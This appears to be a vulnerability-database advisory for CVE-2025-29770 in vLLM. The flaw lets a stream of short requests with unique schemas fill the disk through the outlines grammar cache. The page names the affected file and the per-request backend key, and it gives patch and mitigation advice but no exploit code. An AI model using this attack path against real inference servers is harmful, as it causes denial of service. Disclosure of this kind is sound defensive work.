CVE-2025-29770
MEDIUMCVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
3Tags
Description
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
Analysis
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, low attack complexity. This Allocation of Resources Without Limits vulnerability could allow attackers to exhaust system resources through uncontrolled allocation.
Technical Context
This vulnerability is classified as Allocation of Resources Without Limits (CWE-770), which allows attackers to exhaust system resources through uncontrolled allocation. vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0. Affected products include: Vllm.
Affected Products
Vllm.
Remediation
A vendor patch is available. Apply the latest security update as soon as possible. Set resource limits, implement rate limiting, validate input sizes.
Priority Score
Vendor Status
Share
External POC / Exploit Code
Leaving vuln.today